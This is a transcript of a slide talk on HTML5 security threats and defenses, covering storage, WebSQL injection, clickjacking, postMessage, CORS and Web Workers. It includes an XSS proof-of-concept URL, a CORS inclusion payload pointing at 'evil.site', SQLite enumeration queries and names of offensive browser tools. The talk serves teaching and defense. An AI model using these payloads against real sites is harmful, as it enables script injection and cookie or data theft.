Talk about html5 security
-
Upload
huang-toby -
Category
Education
-
view
2.862 -
download
1
description
Transcript of Talk about html5 security
youstar@insight-labs
Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
History HTML1.0——1993.6 Not Standard
HTML 2.0——1995.11 RFC 1866
HTML 3.2——1996.1.14 W3C Recommended Standard
HTML 4.0——1997.12.18 W3C Recommended Standard
HTML 4.01——1999.12.24 W3C Recommended Standard
XHTML——2000.1.20 W3C Recommended Standard
HTML5——2008 First Draft Standard
2012 W3C Candidate Recommendation
Features
The three aspects of HTML5
Content HTML New Tags and Attributes
Presentation of content CSS
Interaction with content JavaScript Add New API Drag LocalStorage WebWorkers etc
Features
XSS abuse with tags and attributes
Hiding URL Code
Stealing from the storage
Injecting and Exploiting WebSQL
ClickJacking &&CookieJacking
Cross Origin Request and postMessage
Client‐side File Includes
Botnet and widgets
In: New tags: <button>,<video>,<audio>,<article>,<footer>,<nav> New attributes for tags: autocomplete, autofocus, pattern(yes,regex) for
input New media events New <canvas> tag for 2D rendering New form controls for date and time Geolocation New selectors Client-side storage including localStorage, sessionStorage, and WebSQL
Out: Presentation elements such a <font>, <center> Presentation attributes including align, border <frame>,<frameset> <applet> Old special effects: <marquee>,<bgsound> <noscript>
Attack:
New XSS Vector
Bypass Black-list Filter
Defense:
Add new tags to Black-list
Change Regex
DOM window.history.back();
window.history.forward();
window.history.go(); HTML5 history.pushState() history.pushState(state object,title,URL);
history.replaceState() The same with pushState,but modifies the current
history entry.
http://127.0.0.1/html5/poc/history/xsspoc.php?xss=<script>history.pushState(,'',location.href.split("?").shift());document.write(1)</script>
http://127.0.0.1/html5/poc/history/xsspoc.php
Type LocalStorage:for long-term storage
SessionStorage:for the session application(last when the browser closed)
Differences Cookies:4k
LocalStorage/ SessionStorage:depends on browser(usually 5MB)
Support Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera
10.50
Function (localStorage | sessionStorage).setItem()
(localStorage | sessionStorage).getItem()
(localStorage | sessionStorage).deleteItem()
(localStorage | sessionStorage).clear()
Attack
Get the data from the storage(cookie,passwd,etc)
Storage your xss shellcode
Unlimit the path
Defense
Don’t store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HTTPOnly and Secure flags
Database Storage
The same as the Google Gears
Operate openDatabase("Database Name", "Database Version", "Database
Description", "Estimated Size");
transaction("YOUR SQL STATEMENT HERE");
executeSql();
Type
SQLite (support by WebKit)
Attack
Store shellcode
SQL inject
Defense
Strick with the sql operate
Encode the sql result before display
Don’t store sensitive data
Store shellcode
SQL Injection Use sqlite_master SELECT name FROM sqlite_master WHERE type='table'
SELECT sql FROM sqlite_master WHERE name='table_name'
SELECT sqlite_version()
Select with ? executeSql("SELECT name FROM stud WHERE id=" +
input_id); False
executeSql("SELECT name FROM stud WHERE id=?", [input_id]); True
Drag and drop basics Drag Data the drag feedback image drag effects
Drag events: dragstart dragenter dragover dragleave drag drop dragend
ClickJacking
XSS + Drag
CookieJacking
Use many technology to steal user’s local cookies
Technology
How to read the local fileiframe+file://
How to detect the state of cookies Clickjacking
How to send cookiesSMB
Defense
Use iframe with sandbox
If (top !== window) top.location= window.location.href;
if (top!=self) top.location.href=self.location.href
postMessage
Send
otherWindow.postMessage(message, targetOrigin);
Receive
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event)
if (event.origin !== "http://example.org:8080")
return;
// ...
Defense
Check the postMessage origin
Don’t use innerHTML
Element.innerHTML=e.data;//danger
Element.textContent=e.data;//safe
Don’t use Eval to deal with the mesage
Cross-Origin Resource Sharing
Originally Ajax calls were subject to Same Origin Policy
Site A cannot make XMLHttpRequests to Site B
HTML5 makes it possible to make these cross domain calls
Site ASite B(Response must include a header)
Access-Control-Allow-Origin: Site A Must
Access-Control-Allow-Credentials: true | false
Access-Control-Expose-Headers:
etc
Defense
Don’t set this: Access-Control-Allow-Origin: *
(Flash crossdomain.xml )
Prevent DDOS
if(origin=="Site A")header(Access-Control-Allow-Origin:Site A)……//process request
Code like this: <html><body><script>
x = new XMLHttpRequest();
x.open("GET",location.hash.substring(1));
x.onreadystatechange=function()if(x.readyState==4)
document.getElementById("main").innerHTML=x.responseText;
x.send();
</script>
<div id=“main”></div>
</body></html>
POC
Introducing Cross Origin Requests http://example.com/#http://evil.site/payload.php
VContents of ‘payload.php’ will be included as HTML within <div id=“main”></div>
New type of XSS!!
Web Workers
running scripts in the background independently
Very simple var w = new Worker("some_script.js");
w.onmessage = function(e) // do something ;
w.terminate()
Access XHR,navigator object,application cache,spawn other workers!
Can’t access
DOM,window,document objects
Attack
Botnet
Application‐level DDoS attacks
Email Spam
Distributed password cracking
Network Scanning
Guessing User’s Private IP Address
Identify the user’s subnet
Identify the IP address
COR+XSS+Workers=shell of the future
HTML5CSdump
enumeration and extraction techniques described before to obtain all the client-side storage relative to a certain domain name
JS-Recon
Port Scans
Network Scans
Detecting private IP address
Imposter Steal cookies
Set cookies
Steal Local Shared Objects
Steal stored passwords from FireFox
etc Shell of the Future Reverse Web Shell handler
Bypass anti-session hijacking measures
Ravan
JavaScript based Distributed Computing system
hashing algorithms
MD5
SHA1
SHA256
SHA512
HTML5 带来的新安全威胁:xisigr Attacking with HTML5:lavakumark Abusing HTML5:Ming Chow HTML5 Web Security:Thomas Röthlisberger Abusing HTML 5 Structured Client-side Storage:Alberto Trivero
Cookiejacking:Rosario Valotta http://heideri.ch/jso/#html5 http://www.wooyun.org/bugs/wooyun-2011-02351 http://shreeraj.blogspot.com/2011/03/html-5-xhr-l2-and-
dom-l3-top-10-attacks.html http://www.html5test.com
http://hi.baidu.com/xisigr/blog/item/aebf0728abd960f299250abe.html
http://blog.whatwg.org/whats-next-in-html-episode-2-sandbox http://code.google.com/intl/zh-CN/apis/gears/api_database.html http://michael-coates.blogspot.com/2010/07/html5-local-storage-
and-xss.html http://www.w3.org/TR/access-control/ http://m-austin.com/blog/?p=19 https://developer.mozilla.org/en/ http://www.w3.org/TR/cors/ http://www.andlabs.org/tools/ravan.html http://www.gnucitizen.org/blog/client-side-sql-injection-attacks/